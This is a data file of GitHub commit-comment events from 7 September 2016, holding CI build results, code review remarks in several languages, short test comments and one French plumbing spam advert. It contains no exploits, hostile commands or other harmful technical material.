{"id":"4526774152","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18926247,"position":null,"line":null,"path":null,"commit_id":"1fd25bcc33a0e50b74fec409e83e2d52d2360da8","created_at":"2016-09-07T10:30:57Z","updated_at":"2016-09-07T10:30:57Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 953](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12849&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Tests failed: 1, passed: 213, ignored: 3 Build time: 00:07:56\n### Failed tests\n```\norg.genivi.sota.device_registry.test.DeviceResourceSpec.GET request with ?regex yields devices which match the regex.: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-07T10:30:57Z"}
{"id":"4526775248","type":"CommitCommentEvent","actor":{"login":"zjleifeng"},"repo":{"name":"zjleifeng/2016test"},"payload":{"comment":{"id":18926248,"position":1,"line":1,"path":"test1","commit_id":"a83a0906a1a06344beea1a606acbf8942cc785f4","created_at":"2016-09-07T10:31:12Z","updated_at":"2016-09-07T10:31:12Z","body":"trtrtrt"}},"created_at":"2016-09-07T10:31:12Z"}
{"id":"4526776251","type":"CommitCommentEvent","actor":{"login":"zjleifeng"},"repo":{"name":"zjleifeng/2016test"},"payload":{"comment":{"id":18926250,"position":null,"line":null,"path":null,"commit_id":"a83a0906a1a06344beea1a606acbf8942cc785f4","created_at":"2016-09-07T10:31:25Z","updated_at":"2016-09-07T10:31:25Z","body":"r"}},"created_at":"2016-09-07T10:31:25Z"}
{"id":"4526777548","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18926257,"position":null,"line":null,"path":null,"commit_id":"1fd25bcc33a0e50b74fec409e83e2d52d2360da8","created_at":"2016-09-07T10:31:41Z","updated_at":"2016-09-07T10:31:41Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 954](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12851&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-07T10:31:41Z"}
{"id":"4526777718","type":"CommitCommentEvent","actor":{"login":"olegik-orlov"},"repo":{"name":"khalymon/Module_02"},"payload":{"comment":{"id":18926258,"position":55,"line":55,"path":"Module_02/src/Task1/Task1.java","commit_id":"5c5aa3c158b9442242d38a85db6031c752f1952d","created_at":"2016-09-07T10:31:44Z","updated_at":"2016-09-07T10:31:44Z","body":"оборачивать каждое условие в круглые скобки в данном условии и ряде других по этому заданию - излишне"}},"created_at":"2016-09-07T10:31:44Z"}
{"id":"4526778101","type":"CommitCommentEvent","actor":{"login":"samsalisbury"},"repo":{"name":"nyarly/sous"},"payload":{"comment":{"id":18926259,"position":59,"line":59,"path":"server/router.go","commit_id":"45b4446bfe21e550b1346f087b754f7ba07e56dd","created_at":"2016-09-07T10:31:48Z","updated_at":"2016-09-07T10:31:48Z","body":"`SousRouteMap` ? This global makes me nervous (as does my `TopLevelCommands` in cli). I wonder if we should wrap the router & map in a type to keep it encapsulated? Def wouldn't block a merge over this, just thinking out loud."}},"created_at":"2016-09-07T10:31:48Z"}
{"id":"4526778326","type":"CommitCommentEvent","actor":{"login":"Simn"},"repo":{"name":"HaxeFoundation/haxelib"},"payload":{"comment":{"id":18926260,"position":null,"line":null,"path":null,"commit_id":"c124d95be27073728214eab3137d6b613bfd8fee","created_at":"2016-09-07T10:31:51Z","updated_at":"2016-09-07T10:31:51Z","body":"Fair enough, but does that have to be handled via branches? I imagine we could always publish to staging by default unless the commit message contains `[publish]` or something. That way real deployment comes down to making a commit instead of a merge."}},"created_at":"2016-09-07T10:31:51Z"}
{"id":"4526778466","type":"CommitCommentEvent","actor":{"login":"teresathen"},"repo":{"name":"KristineWolf/Eventastic"},"payload":{"comment":{"id":18926262,"position":null,"line":null,"path":null,"commit_id":"e8d6e673cd4cb235488bdb286f77f8879b024a2d","created_at":"2016-09-07T10:31:53Z","updated_at":"2016-09-07T10:31:53Z","body":"- finde ich gut, klappt bei mir!\r\n- ich weiß nicht wie sinnvoll das mit GoogleMaps ohne Adresse ist... Wenn man in München ist und zu einem Event in München will ohne genaue Adresse, ist das ja irgendwie komisch. Ich glaube ich würde es einfach weglassen."}},"created_at":"2016-09-07T10:31:53Z"}
{"id":"4526780898","type":"CommitCommentEvent","actor":{"login":"yiminghe"},"repo":{"name":"ant-design/ant-design-mobile"},"payload":{"comment":{"id":18926270,"position":31,"line":60,"path":"components/date-picker/demo/basic.md","commit_id":"91830d4939cf3dbd998b0135a8090141a242dc54","created_at":"2016-09-07T10:32:23Z","updated_at":"2016-09-07T10:32:23Z","body":"value 和 getFieldProps 不能同时使用"}},"created_at":"2016-09-07T10:32:23Z"}
{"id":"4526783813","type":"CommitCommentEvent","actor":{"login":"jindrahelcl"},"repo":{"name":"bplower/cssef"},"payload":{"comment":{"id":18926277,"position":null,"line":null,"path":null,"commit_id":"481b85e910d2c381689eebd92b944a140428028d","created_at":"2016-09-07T10:33:05Z","updated_at":"2016-09-07T10:33:05Z","body":"Well, did that work? :-)"}},"created_at":"2016-09-07T10:33:05Z"}
{"id":"4526784594","type":"CommitCommentEvent","actor":{"login":"yurem"},"repo":{"name":"GluuFederation/oxAuth"},"payload":{"comment":{"id":18926279,"position":null,"line":null,"path":null,"commit_id":"bcfd845f8d2a05ab0f1c3b25d4b53a4cf6c8d2c0","created_at":"2016-09-07T10:33:15Z","updated_at":"2016-09-07T10:33:15Z","body":"I added Cors wpapper to allow run oxAuth in Tomcat and Jetty without configuration updates:\r\nhttps://github.com/GluuFederation/oxCore/blob/master/oxServer/src/main/java/org/gluu/oxserver/filters/CorsFilter.java"}},"created_at":"2016-09-07T10:33:15Z"}
{"id":"4526785737","type":"CommitCommentEvent","actor":{"login":"knutin"},"repo":{"name":"elli-lib/elli_date"},"payload":{"comment":{"id":18926285,"position":null,"line":null,"path":null,"commit_id":"33d8623d15eed0f97c99f6c5f98dd020780cf45f","created_at":"2016-09-07T10:33:30Z","updated_at":"2016-09-07T10:33:30Z","body":"Yes, I'm officially down with the MIT license. Thanks for adding it. Sometimes I forget..\r\n\r\nEmail is the best option to contact me :)\r\n\r\n"}},"created_at":"2016-09-07T10:33:30Z"}
{"id":"4526786046","type":"CommitCommentEvent","actor":{"login":"seikur0"},"repo":{"name":"AeonLucid/POGOProtos"},"payload":{"comment":{"id":18926286,"position":5,"line":19,"path":"src/POGOProtos/Networking/Envelopes/RequestEnvelope.proto","commit_id":"0170d19e1a02e65d1f600904a915b5988af39bd4","created_at":"2016-09-07T10:33:33Z","updated_at":"2016-09-07T10:33:33Z","body":"Are locationhash1 and locationhash2 generated with accuracy or with the altitude?"}},"created_at":"2016-09-07T10:33:33Z"}
{"id":"4526788502","type":"CommitCommentEvent","actor":{"login":"SlowMemory"},"repo":{"name":"SlowMemory/List-KR"},"payload":{"comment":{"id":18926294,"position":null,"line":null,"path":null,"commit_id":"43c99004cda3bc2437e480535eace5a5357e60f9","created_at":"2016-09-07T10:34:08Z","updated_at":"2016-09-07T10:34:08Z","body":"This addresses #55 "}},"created_at":"2016-09-07T10:34:08Z"}
{"id":"4526791201","type":"CommitCommentEvent","actor":{"login":"andyli"},"repo":{"name":"HaxeFoundation/haxelib"},"payload":{"comment":{"id":18926297,"position":null,"line":null,"path":null,"commit_id":"c124d95be27073728214eab3137d6b613bfd8fee","created_at":"2016-09-07T10:34:43Z","updated_at":"2016-09-07T10:34:43Z","body":"Umm.. Maybe. Have to use `git commit --allow-empty` though or else we have to make some actual change to the files. Let me think about it."}},"created_at":"2016-09-07T10:34:43Z"}
{"id":"4526796229","type":"CommitCommentEvent","actor":{"login":"nadako"},"repo":{"name":"vshaxe/haxe-languageserver"},"payload":{"comment":{"id":18926308,"position":null,"line":null,"path":null,"commit_id":"ba566b587d15214fc45aaa2137544f7644213b53","created_at":"2016-09-07T10:35:49Z","updated_at":"2016-09-07T10:35:49Z","body":"I tested with --times in display config"}},"created_at":"2016-09-07T10:35:49Z"}
{"id":"4526799092","type":"CommitCommentEvent","actor":{"login":"siddontang"},"repo":{"name":"pingcap/tidb-tools"},"payload":{"comment":{"id":18926314,"position":null,"line":null,"path":null,"commit_id":"505f77b1f0290b7c2c2757afd9f02f6d9e7142ef","created_at":"2016-09-07T10:36:30Z","updated_at":"2016-09-07T10:36:30Z","body":"LGTM"}},"created_at":"2016-09-07T10:36:30Z"}
{"id":"4526800214","type":"CommitCommentEvent","actor":{"login":"andela-ooduntan"},"repo":{"name":"cyrielo/invertedIndex"},"payload":{"comment":{"id":18926315,"position":35,"line":152,"path":"src/inverted-index.js","commit_id":"060c551de5b00f1377d4ef56a457bfe5c73e8143","created_at":"2016-09-07T10:36:45Z","updated_at":"2016-09-07T10:36:45Z","body":"## Code quality - Critical\r\nYou should leave a space after the forward slash in comment\r\nIt should be like this \r\n```// this is a javascript comment```"}},"created_at":"2016-09-07T10:36:45Z"}
{"id":"4526802005","type":"CommitCommentEvent","actor":{"login":"wangchl"},"repo":{"name":"wangchl/helloWorld"},"payload":{"comment":{"id":18926319,"position":null,"line":null,"path":null,"commit_id":"20ea19dc02efe91dbf940fd4def194db80892b13","created_at":"2016-09-07T10:37:10Z","updated_at":"2016-09-07T10:37:10Z","body":"第一个测试项目"}},"created_at":"2016-09-07T10:37:10Z"}
{"id":"4526804839","type":"CommitCommentEvent","actor":{"login":"vivekimsit"},"repo":{"name":"vivekimsit/nx-framework"},"payload":{"comment":{"id":18926325,"position":null,"line":null,"path":null,"commit_id":"c0812965a1c817710e0388cefe4706f9ed186171","created_at":"2016-09-07T10:37:46Z","updated_at":"2016-09-07T10:37:46Z","body":"FIY,\r\n\r\nhttp://stackoverflow.com/questions/39365447/how-to-check-if-an-attribute-is-a-boolean-attribute"}},"created_at":"2016-09-07T10:37:46Z"}
{"id":"4526809513","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18926334,"position":null,"line":null,"path":null,"commit_id":"1fd25bcc33a0e50b74fec409e83e2d52d2360da8","created_at":"2016-09-07T10:38:51Z","updated_at":"2016-09-07T10:38:51Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 954](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12851&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 237, ignored: 3 Build time: 00:07:09"}},"created_at":"2016-09-07T10:38:51Z"}
{"id":"4526810572","type":"CommitCommentEvent","actor":{"login":"meeber"},"repo":{"name":"chaijs/chai"},"payload":{"comment":{"id":18926337,"position":null,"line":null,"path":null,"commit_id":"b826feba514a6caa1f2fa5103e6e16a310a1a7bb","created_at":"2016-09-07T10:39:04Z","updated_at":"2016-09-07T10:39:04Z","body":"@paul-barry-kenzan @walterpinson The best place to read about the issues with the previous attempt at allowing both property and method assertions is: #302, particularly https://github.com/chaijs/chai/issues/302#issuecomment-62540167.\r\n\r\n#726 contains ongoing discussion related to this issue. Please use that thread for any further discussion."}},"created_at":"2016-09-07T10:39:04Z"}
{"id":"4526811485","type":"CommitCommentEvent","actor":{"login":"aichholzer"},"repo":{"name":"sindresorhus/boxen"},"payload":{"comment":{"id":18926338,"position":null,"line":null,"path":null,"commit_id":"d7a92e39f29ba41378c4dba83ad8dd67b3f553d5","created_at":"2016-09-07T10:39:17Z","updated_at":"2016-09-07T10:39:17Z","body":"Yeah, I missed that train. I left the comment about helping just seconds before I realized it had already been made into another release.\r\n\r\nKeep it up!\r\n👍🏼"}},"created_at":"2016-09-07T10:39:17Z"}
{"id":"4526825154","type":"CommitCommentEvent","actor":{"login":"jimconner"},"repo":{"name":"alphagov/paas-cf"},"payload":{"comment":{"id":18926363,"position":10,"line":69,"path":"concourse/pipelines/create-deployer.yml","commit_id":"d1428aab4a0f3a12381a4b1b4cb04ac1427448e6","created_at":"2016-09-07T10:42:18Z","updated_at":"2016-09-07T10:42:18Z","body":"The id_rsa key still seems to be required by the bootstrap-concourse during the vpc/deploy-vpc stage. I'm doing a fresh deploy today and it is unable to get past deploy-vpc unless I add this ssh-private-key task back in again... Am I doing something wrong, or was this an oversight?"}},"created_at":"2016-09-07T10:42:18Z"}
{"id":"4526827435","type":"CommitCommentEvent","actor":{"login":"andela-ooduntan"},"repo":{"name":"cyrielo/invertedIndex"},"payload":{"comment":{"id":18926366,"position":37,"line":153,"path":"src/inverted-index.js","commit_id":"060c551de5b00f1377d4ef56a457bfe5c73e8143","created_at":"2016-09-07T10:42:49Z","updated_at":"2016-09-07T10:42:49Z","body":"##Code quality - Critical\r\nThe space before the closing bracket of if-statement is unnecessary"}},"created_at":"2016-09-07T10:42:49Z"}
{"id":"4526828478","type":"CommitCommentEvent","actor":{"login":"HutchinTang"},"repo":{"name":"HutchinTang/-test"},"payload":{"comment":{"id":18926368,"position":null,"line":null,"path":null,"commit_id":"1ad7e55dd198927214062980195a170b8adbcd77","created_at":"2016-09-07T10:43:03Z","updated_at":"2016-09-07T10:43:03Z","body":"dwsd"}},"created_at":"2016-09-07T10:43:03Z"}
{"id":"4526829755","type":"CommitCommentEvent","actor":{"login":"HutchinTang"},"repo":{"name":"HutchinTang/-test"},"payload":{"comment":{"id":18926374,"position":2,"line":2,"path":"README.md","commit_id":"1ad7e55dd198927214062980195a170b8adbcd77","created_at":"2016-09-07T10:43:19Z","updated_at":"2016-09-07T10:43:19Z","body":"颠三倒四\r\n"}},"created_at":"2016-09-07T10:43:19Z"}
{"id":"4526833128","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18926380,"position":null,"line":null,"path":null,"commit_id":"f5a700fcb26cf2e4f4298971eefae693276906fa","created_at":"2016-09-07T10:44:05Z","updated_at":"2016-09-07T10:44:05Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 955](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12858&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-07T10:44:05Z"}
{"id":"4526834598","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18926383,"position":null,"line":null,"path":null,"commit_id":"16bc5309b752035bfe58df01f3b609d3d933ebda","created_at":"2016-09-07T10:44:25Z","updated_at":"2016-09-07T10:44:25Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 956](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12860&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-07T10:44:25Z"}
{"id":"4526840428","type":"CommitCommentEvent","actor":{"login":"solkimicreb"},"repo":{"name":"vivekimsit/nx-framework"},"payload":{"comment":{"id":18926398,"position":null,"line":null,"path":null,"commit_id":"c0812965a1c817710e0388cefe4706f9ed186171","created_at":"2016-09-07T10:45:44Z","updated_at":"2016-09-07T10:45:44Z","body":"great! \r\n\r\nSome attributes has different prop reflection names than the attribute name (like `class` -> `className`). I will check if there are any boolean attributes like that.\r\n\r\nDo you like the idea btw or do you think its is to generalized/hackish and would stick with the custom `disabled` handler?"}},"created_at":"2016-09-07T10:45:44Z"}
{"id":"4526844019","type":"CommitCommentEvent","actor":{"login":"Gama11"},"repo":{"name":"vshaxe/haxe-languageserver"},"payload":{"comment":{"id":18926402,"position":null,"line":null,"path":null,"commit_id":"ba566b587d15214fc45aaa2137544f7644213b53","created_at":"2016-09-07T10:46:32Z","updated_at":"2016-09-07T10:46:32Z","body":"Thanks, I see it now. :)"}},"created_at":"2016-09-07T10:46:32Z"}
{"id":"4526845079","type":"CommitCommentEvent","actor":{"login":"vvenkatesh91Github"},"repo":{"name":"vvenkatesh91Github/Othello-Board-Game"},"payload":{"comment":{"id":18926404,"position":null,"line":null,"path":null,"commit_id":"fe8c6b0ded910b330e6c44c0ea95707fd12a91d3","created_at":"2016-09-07T10:46:46Z","updated_at":"2016-09-07T10:46:46Z","body":"Final Commit"}},"created_at":"2016-09-07T10:46:46Z"}
{"id":"4526858235","type":"CommitCommentEvent","actor":{"login":"meyerj"},"repo":{"name":"orocos/rtt_ros_integration"},"payload":{"comment":{"id":18926419,"position":null,"line":null,"path":null,"commit_id":"eab62059c10abb20fffbd3743891d7cace7da896","created_at":"2016-09-07T10:49:45Z","updated_at":"2016-09-07T10:49:45Z","body":"`SUFFIX` and `SUFFIX2` are used as suffixes for the executable:\r\n- If `DEBUG` is true, `SUFFIX` is set to `-debug`, otherwise left empty.\r\n- If `SCREEN` is true, `SUFFIX2` is set to `-screen`, otherwise to the value of `SUFFIX`. The `SCREEN` argument takes precedence over `DEBUG`.\r\n- rttlua is launched as `rttlua$(arg SUFFIX2)`.\r\n\r\nWhy do you think this is wrong? But I admit that I did not test it yet.\r\n\r\nThe approach of having different scripts for what should be options for the same script (either passed on the command line or via environment variables) is kind of limited and cannot deal with all possible combinations. This commit only fixes the bug but does not change the original principle."}},"created_at":"2016-09-07T10:49:45Z"}
{"id":"4526860108","type":"CommitCommentEvent","actor":{"login":"ajithcj"},"repo":{"name":"ajithcj/Stockfish"},"payload":{"comment":{"id":18926423,"position":null,"line":null,"path":null,"commit_id":"fd95e858fda90723c6cd5032f46b43c46e1e5800","created_at":"2016-09-07T10:50:10Z","updated_at":"2016-09-07T10:50:10Z","body":"Sure. I understand the rationale. I somehow thought other combo patches in the past did mix multiple ideas. Maybe they were all parameter tweak combos.\r\nJust wanted to make sure two ELO patches don't go waste. But I should stop trying too hard I guess :)"}},"created_at":"2016-09-07T10:50:10Z"}
{"id":"4526862799","type":"CommitCommentEvent","actor":{"login":"Haxk20"},"repo":{"name":"silver13/h8mini-testing"},"payload":{"comment":{"id":18926426,"position":null,"line":null,"path":null,"commit_id":"d6363393b38ed5029911a9a3e2a1fc309cfe7088","created_at":"2016-09-07T10:50:43Z","updated_at":"2016-09-07T10:50:43Z","body":"can you send me link for that app because mine shows no devices just nothing and when the quad will be aviable to be visible\r\n"}},"created_at":"2016-09-07T10:50:43Z"}
{"id":"4526865380","type":"CommitCommentEvent","actor":{"login":"mtekel"},"repo":{"name":"alphagov/paas-cf"},"payload":{"comment":{"id":18926429,"position":10,"line":69,"path":"concourse/pipelines/create-deployer.yml","commit_id":"d1428aab4a0f3a12381a4b1b4cb04ac1427448e6","created_at":"2016-09-07T10:51:19Z","updated_at":"2016-09-07T10:51:19Z","body":"Are you running from the latest master? I grepped for id_rsa in terraform/vpc and there are no occurences. Also, we just merged v240."}},"created_at":"2016-09-07T10:51:19Z"}
{"id":"4526866252","type":"CommitCommentEvent","actor":{"login":"Ramanesh-01"},"repo":{"name":"Ramanesh-01/SearchTesting"},"payload":{"comment":{"id":18926432,"position":null,"line":null,"path":null,"commit_id":"f4020db9aae248a3fee7b771d7a34640592bc270","created_at":"2016-09-07T10:51:31Z","updated_at":"2016-09-07T10:51:31Z","body":"Search Github Comment"}},"created_at":"2016-09-07T10:51:31Z"}
{"id":"4526867367","type":"CommitCommentEvent","actor":{"login":"vivekimsit"},"repo":{"name":"vivekimsit/nx-framework"},"payload":{"comment":{"id":18926435,"position":null,"line":null,"path":null,"commit_id":"c0812965a1c817710e0388cefe4706f9ed186171","created_at":"2016-09-07T10:51:47Z","updated_at":"2016-09-07T10:51:47Z","body":"I hope you find something, having said that since its a special case I would like it to be a separate logic and once we find something concrete we can change it in the next release, anyways it shouldn't change the external API, wdyt?"}},"created_at":"2016-09-07T10:51:47Z"}
{"id":"4526868464","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18926440,"position":null,"line":null,"path":null,"commit_id":"16bc5309b752035bfe58df01f3b609d3d933ebda","created_at":"2016-09-07T10:52:02Z","updated_at":"2016-09-07T10:52:02Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 956](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12860&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Tests failed: 6 (6 new), passed: 208, ignored: 3 Build time: 00:07:38\n### Failed tests\n```\norg.genivi.sota.device_registry.test.DeviceResourceSpec.GET request with ?regex yields devices which match the regex.: <no details avaliable>\n\norg.genivi.sota.device_registry.test.DeviceResourceSpec.PUT request after POST succeeds with updated device.: <no details avaliable>\n\norg.genivi.sota.device_registry.test.DeviceResourceSpec.POST request with same deviceId fails with conflict.: <no details avaliable>\n\norg.genivi.sota.device_registry.test.DeviceResourceSpec.PUT request updates device.: <no details avaliable>\n\norg.genivi.sota.device_registry.test.DeviceResourceSpec.PUT request with same deviceName fails with conflict.: <no details avaliable>\n\norg.genivi.sota.device_registry.test.DeviceResourceSpec.PUT request with same deviceId fails with conflict.: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-07T10:52:02Z"}
{"id":"4526868526","type":"CommitCommentEvent","actor":{"login":"frankmayer"},"repo":{"name":"arangodb/arangodb-php"},"payload":{"comment":{"id":18926441,"position":47,"line":47,"path":"CHANGELOG","commit_id":"8aca9a25e1b676f64f7790a16650f88b22c2ab50","created_at":"2016-09-07T10:52:03Z","updated_at":"2016-09-07T10:52:03Z","body":"Thanks, works great btw. In my testcase with a batchsize of 10000, I am getting twice the throughput as without batching.\r\nI have also experimentally tweaked the batch mechanism a bit, which gives about a 10% increase in performance on really big batches. (around 10000 batchparts). as soon as I have done some more testing, I'll submit it.\r\n\r\nBTW, do you have any info on the implementation of triggers in ArangoDB?"}},"created_at":"2016-09-07T10:52:03Z"}
{"id":"4526871856","type":"CommitCommentEvent","actor":{"login":"juliotoscano"},"repo":{"name":"amadeusproject/uxdesign-html"},"payload":{"comment":{"id":18926447,"position":null,"line":null,"path":null,"commit_id":"a2a41f69e4636cdc50f30379f7b1d6ec91b17dd0","created_at":"2016-09-07T10:52:47Z","updated_at":"2016-09-07T10:52:47Z","body":"O header está sem a tag Body. Por favor inserir."}},"created_at":"2016-09-07T10:52:47Z"}
{"id":"4526872684","type":"CommitCommentEvent","actor":{"login":"arjunguha"},"repo":{"name":"plasma-umass/compsci631"},"payload":{"comment":{"id":18926450,"position":null,"line":null,"path":null,"commit_id":"577ef7c03d1582363812838312ae4af359748640","created_at":"2016-09-07T10:52:59Z","updated_at":"2016-09-07T10:52:59Z","body":"oh interesting. I guess the syntax changed, or I was just doing it wrong the whole time. Thanks for the fix!"}},"created_at":"2016-09-07T10:52:59Z"}
{"id":"4526872801","type":"CommitCommentEvent","actor":{"login":"Garbee"},"repo":{"name":"google/material-design-lite"},"payload":{"comment":{"id":18926451,"position":null,"line":null,"path":null,"commit_id":"4944037bcd7099521687b6148a85594a57926e0f","created_at":"2016-09-07T10:52:59Z","updated_at":"2016-09-07T10:52:59Z","body":"We know, issue #4675 is working to address this."}},"created_at":"2016-09-07T10:52:59Z"}
{"id":"4526873669","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18926454,"position":null,"line":null,"path":null,"commit_id":"f5a700fcb26cf2e4f4298971eefae693276906fa","created_at":"2016-09-07T10:53:11Z","updated_at":"2016-09-07T10:53:11Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 955](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12858&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 237, ignored: 3 Build time: 00:09:06"}},"created_at":"2016-09-07T10:53:11Z"}
{"id":"4526878031","type":"CommitCommentEvent","actor":{"login":"Plombier94"},"repo":{"name":"openlayers/ol3"},"payload":{"comment":{"id":18926468,"position":null,"line":null,"path":null,"commit_id":"14c9212992cef101f6938f2ea537ba200d556c88","created_at":"2016-09-07T10:54:07Z","updated_at":"2016-09-07T10:54:07Z","body":"Bienvenue chez L’artisanat\r\n\r\nNotre équipe de plomberie est disponible à votre service 24/24 et 7/7 avec le bon prix. \r\nMerci de consulter notre site .\r\n>>>>[](http://plombier94.urgenceartisanpascher.com/)\r\nPlombier Créteil\r\n>>>>[](http://plombiercreteil.urgenceartisanpascher.com/)\r\nTrouver une société de plomberie via le net est une solution à la fois rapide et d’une grande simplicité.\r\nVous envisager rénover votre équipement sanitaire et vous cherchez un plombier pas cher Créteil de qualité affichant un prix raisonnable et disponible en permanence 24H/24et 7J/7 \r\nVous êtes à la bonne adresse ! Notre plombier pas cher Créteil qualifié et certifié, vous garantisse une prestation de qualité et à moindre coût. Quel que soit votre problème en matière de plomberie sur Créteil : Notre artisan plombier assurera rapidement le dépannage.\r\n"}},"created_at":"2016-09-07T10:54:07Z"}
{"id":"4526879636","type":"CommitCommentEvent","actor":{"login":"kkochetov"},"repo":{"name":"kkochetov/selenide"},"payload":{"comment":{"id":18926472,"position":36,"line":149,"path":"src/main/java/com/codeborne/selenide/commands/Commands.java","commit_id":"f9ebfef8033b6cd991f58dad3a945ad52ca9ed9e","created_at":"2016-09-07T10:54:29Z","updated_at":"2016-09-07T10:54:29Z","body":"element забыл вставить"}},"created_at":"2016-09-07T10:54:29Z"}
{"id":"4526879955","type":"CommitCommentEvent","actor":{"login":"julen"},"repo":{"name":"ta2-1/pootle"},"payload":{"comment":{"id":18926474,"position":null,"line":null,"path":null,"commit_id":"5bbef91fac7fbbb943f085556608018d350f8185","created_at":"2016-09-07T10:54:33Z","updated_at":"2016-09-07T10:54:33Z","body":"We internally use this prop to determine the format of the source string. Is it replaced by `sourceValues`?"}},"created_at":"2016-09-07T10:54:33Z"}
{"id":"4526883573","type":"CommitCommentEvent","actor":{"login":"julen"},"repo":{"name":"ta2-1/pootle"},"payload":{"comment":{"id":18926483,"position":null,"line":null,"path":null,"commit_id":"244143325a7408cdca94ffd81148bd812f5fe46e","created_at":"2016-09-07T10:55:19Z","updated_at":"2016-09-07T10:55:19Z","body":"Which problem does this specifically fix? How can I validate that?"}},"created_at":"2016-09-07T10:55:19Z"}
{"id":"4526884315","type":"CommitCommentEvent","actor":{"login":"kkochetov"},"repo":{"name":"kkochetov/selenide"},"payload":{"comment":{"id":18926488,"position":55,"line":55,"path":"src/main/java/com/codeborne/selenide/commands/Flash.java","commit_id":"f9ebfef8033b6cd991f58dad3a945ad52ca9ed9e","created_at":"2016-09-07T10:55:28Z","updated_at":"2016-09-07T10:55:28Z","body":"лишние пустые строки"}},"created_at":"2016-09-07T10:55:28Z"}
{"id":"4526888049","type":"CommitCommentEvent","actor":{"login":"psiha"},"repo":{"name":"psiha/build"},"payload":{"comment":{"id":18926492,"position":5,"line":37,"path":"toolchains/msvc.toolchain.cmake","commit_id":"ae0466d6f032ad07bf080e9744c4b589bb0587d5","created_at":"2016-09-07T10:56:20Z","updated_at":"2016-09-07T10:56:20Z","body":"This is a local hack, it cannot go into the public build system.\r\nFix it locally (there is actually an official MS macro for that)."}},"created_at":"2016-09-07T10:56:20Z"}
{"id":"4526889759","type":"CommitCommentEvent","actor":{"login":"andela-ooduntan"},"repo":{"name":"cyrielo/invertedIndex"},"payload":{"comment":{"id":18926495,"position":61,"line":132,"path":"src/inverted-index.js","commit_id":"04b02321e7443a8aa4a8e5a9c38af7f1396e4b94","created_at":"2016-09-07T10:56:44Z","updated_at":"2016-09-07T10:56:44Z","body":"## Code quality - Critical\r\nThis function is too long and complex \r\nYou should refactor it and make it simpler to read and understand"}},"created_at":"2016-09-07T10:56:44Z"}
{"id":"4526890805","type":"CommitCommentEvent","actor":{"login":"cbetta"},"repo":{"name":"Nexmo/nexmo-node"},"payload":{"comment":{"id":18926497,"position":7,"line":47,"path":"package.json","commit_id":"15ea4953a7fac2dfd57a0b48f72fa54e1354679a","created_at":"2016-09-07T10:56:57Z","updated_at":"2016-09-07T10:56:57Z","body":"Is JWT something everyone will use? If not it might be worth adding it as a second library.\r\n\r\nI've done something similar with the autodiscovery for the doxie Gem I made: https://github.com/cbetta/doxie"}},"created_at":"2016-09-07T10:56:57Z"}
{"id":"4526891123","type":"CommitCommentEvent","actor":{"login":"psiha"},"repo":{"name":"psiha/build"},"payload":{"comment":{"id":18926499,"position":5,"line":37,"path":"toolchains/msvc.toolchain.cmake","commit_id":"ae0466d6f032ad07bf080e9744c4b589bb0587d5","created_at":"2016-09-07T10:57:02Z","updated_at":"2016-09-07T10:57:02Z","body":"In general: local hacks and workarounds do not go here..."}},"created_at":"2016-09-07T10:57:02Z"}
{"id":"4526891988","type":"CommitCommentEvent","actor":{"login":"funkyLover"},"repo":{"name":"funkyLover/posts"},"payload":{"comment":{"id":18926501,"position":null,"line":null,"path":null,"commit_id":"4be845ea8c915589ac112341c058d0180ff9f18f","created_at":"2016-09-07T10:57:14Z","updated_at":"2016-09-07T10:57:14Z","body":"@fritx 前端环境烦在我觉得fileAPI还不够强大,,不过其他还好"}},"created_at":"2016-09-07T10:57:14Z"}
